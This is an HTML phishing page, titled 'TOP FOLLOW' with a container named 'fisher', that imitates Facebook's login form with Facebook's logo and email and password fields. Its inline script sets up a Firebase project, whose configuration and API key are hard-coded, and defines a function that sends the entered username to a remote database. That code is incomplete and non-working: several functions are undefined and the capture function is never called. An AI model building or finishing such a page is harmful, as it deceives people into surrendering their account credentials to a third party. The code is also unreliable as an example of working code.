<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TOP FOLLOW</title>
    
    <link rel="stylesheet" href="index.css">
    <link rel="icon" href="logo.png" id="ico" type="image/icon type">
</head>
<body>
    <div id="fisher">
    <div id="form">
            <div id="lg"><img id="imgg" src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt=""></div>
            <h1>Log Into Facebook</h1>
            <input type="username" id="username" placeholder="Email or phone number" name="username"><br>
            <input type="password" id="password" placeholder="password" name="password" ><br>
            <a href="#"><input  type="submit"  name="log in"   id="btn"><br></a>
             <button id="btn" onclick="fn1()"> Check  </button>
            <a href="#">Forgot account? </a><a href="">sign up</a>
        </div>
    </div>
    
</body>
<script type="module">
    // Import the functions you need from the SDKs you need
    import { initializeApp } from "https://www.gstatic.com/firebasejs/11.0.2/firebase-app.js";
    // TODO: Add SDKs for Firebase products that you want to use
    // https://firebase.google.com/docs/web/setup#available-libraries
  
    // Your web app's Firebase configuration
    const firebaseConfig = {
      apiKey: "AIzaSyBd1kXVO9VeXqFVXxERnCUyEKHBlrwwRzA",
      authDomain: "echo-dee33.firebaseapp.com",
      projectId: "echo-dee33",
      storageBucket: "echo-dee33.firebasestorage.app",
      messagingSenderId: "318164043775",
      appId: "1:318164043775:web:4aaa785306672006f989ca"
    };
    
  
    // Initialize Firebase
    function fn1(){
        window.alert("harahiye")
    }
    const app = initializeApp(firebaseConfig);
    function sendMessage() {
  const message = document.getElementById('username').value;
  const messagesRef = ref(database, 'messages/');
  const newMessageRef = push(messagesRef);
  set(newMessageRef, {
    text: message
  });
  document.getElementById('message').value = '';
}
  </script>
</html>
